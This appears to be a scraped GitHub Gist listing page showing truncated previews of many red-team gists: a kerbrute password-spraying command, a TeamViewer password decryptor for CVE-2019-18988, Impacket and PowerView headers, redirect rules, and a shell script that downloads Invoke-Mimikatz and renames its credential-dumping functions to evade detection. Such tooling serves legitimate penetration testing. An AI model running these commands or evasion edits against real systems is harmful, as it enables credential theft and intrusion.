With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| # Decrypt Teamviewer Passwords from exported registry file | |
| # Usage: python tvd.py Teamviewer_Settings.reg | |
| # Modified by readmeexe | |
| # | |
| # CVE-2019-18988 | |
| # Original Author @whynotsecurity | |
| # https://whynotsecurity.com/blog/teamviewer/ | |
| import sys, hexdump, binascii |
nullbind
/ Import-ADandGPO.ps1
Last active
July 11, 2020 12:12
This is an example of how to import the Active Directory and GPO command PowerShell modules on the fly.
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # --------------------------------------------------- | |
| # Load the Active Directory PowerShell module | |
| # --------------------------------------------------- | |
| # $ADModuleBytes = [System.IO.File]::ReadAllBytes("C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.ActiveDirectory.Management\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.ActiveDirectory.Management.dll") | |
| # $ADModuleString = [System.Convert]::ToBase64String($ADModuleBytes) | |
| # Set the string | |
| $ADModuleString = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAHYH/eAAAAAAAAAAAOAAIiALATAAAOgRAAAIAAAAAAAAxtQRAAAgAAAAIBIAAAAAEAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAABgEgAAAgAA9F8SAAMAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAHPUEQBPAAAAACASACQFAAAAAAAAAAAAAAAAAAAAAAAAAEASAAwAAADA0xEAOAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAA5OcRAAAgAAAA6BEAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNy |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved. | |
| # | |
| # This software is provided under under a slightly modified version | |
| # of the Apache Software License. See the accompanying LICENSE file | |
| # for more information. | |
| # | |
| # A similar approach to smbexec but executing commands through WMI. | |
| # Main advantage here is it runs under the user (has to be Admin) | |
| # account, not SYSTEM, plus, it doesn't generate noisy messages |
TarlogicSecurity
/ kerberos_attacks_cheatsheet.md
Created
May 14, 2019 13:33
A cheatsheet with commands that can be used to perform kerberos attacks
mainframed
/ until_nmap.sh
Created
October 18, 2017 04:46
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Nmap can crash when scanning large ranges | |
| # To use this script, start your scan with whatever | |
| # nmap options you want making sure you use -oA <filename> | |
| # or -oG <filename> (you need the gnmap file) then cancel | |
| # the scan. replace <filename> below and run this script. | |
| # It will also record when it failed to a file called failed.txt | |
| until nmap --resume <filename>.gnmap |
curi0usJack
/ .htaccess
Last active
March 13, 2024 10:17
FYI THIS IS NO LONGER AN .HTACCESS FILE. SEE COMMENTS BELOW. DON'T WORRY, IT'S STILL EASY.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # | |
| # TO-DO: set |DESTINATIONURL| below to be whatever you want e.g. www.google.com. Do not include "http(s)://" as a prefix. All matching requests will be sent to that url. Thanks @Meatballs__! | |
| # | |
| # Note this version requires Apache 2.4+ | |
| # | |
| # Save this file into something like /etc/apache2/redirect.rules. | |
| # Then in your site's apache conf file (in /etc/apache2/sites-avaiable/), put this statement somewhere near the bottom | |
| # | |
| # Include /etc/apache2/redirect.rules | |
| # |
curi0usJack
/ twitterfavlinks.py
Last active
May 3, 2020 07:58
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # twitterfavlinks.py - Throw back all your favorites that contain a url. Get any applicable redirects. Note there are Twitter API | |
| # limits, so if you have a gazillion favorites, you probably won't get them all. YMMV | |
| # | |
| # Author: @curi0usJack | |
| # | |
| # Dependencies: | |
| # Tweepy: sudo pip install tweepy | |
| # Twitter API access. Set up here: https://apps.twitter.com/ | |
| import tweepy |
curi0usJack
/ minicars.sh
Last active
April 26, 2021 15:48
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1 | |
| # Uncomment below two lines to clean comments from all .ps1 files in ./ | |
| #find ./ -name "*.ps1" -exec sed -i -e '/^<#/,/^#>/d' {} \; | |
| #find ./ -name "*.ps1" -exec sed -i -e 's/#.*$//' {} \; | |
| sed -i -e '/^<#/,/^#>/d' Invoke-Mimikatz.ps1 | |
| sed -i -e 's/#.*$//' Invoke-Mimikatz.ps1 | |
| sed -i -e's/DumpCerts/GimmeCerts/g' Invoke-Mimikatz.ps1 | |
| sed -i -e 's/DumpCreds/GimmeCreds/g' Invoke-Mimikatz.ps1 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/ | |
| # tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c | |
| # the most up-to-date version of PowerView will always be in the dev branch of PowerSploit: | |
| # https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 | |
| # New function naming schema: | |
| # Verbs: | |
| # Get : retrieve full raw data sets | |
| # Find : ‘find’ specific data entries in a data set |
leftp
/ Authproxyserver.ps1
Last active
November 10, 2020 03:56
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #DISCLAIMER | |
| #I'm not the original author of the script... | |
| #Original git repo vanished | |
| function String-to-ByteArray ($String) | |
| { | |
| $ByteArray=@() | |
| For ( $i = 0; $i -lt ($String.Length/2); $i++ ) | |
| { | |
| $Chars=$String.Substring($i*2,2) |
NewerOlder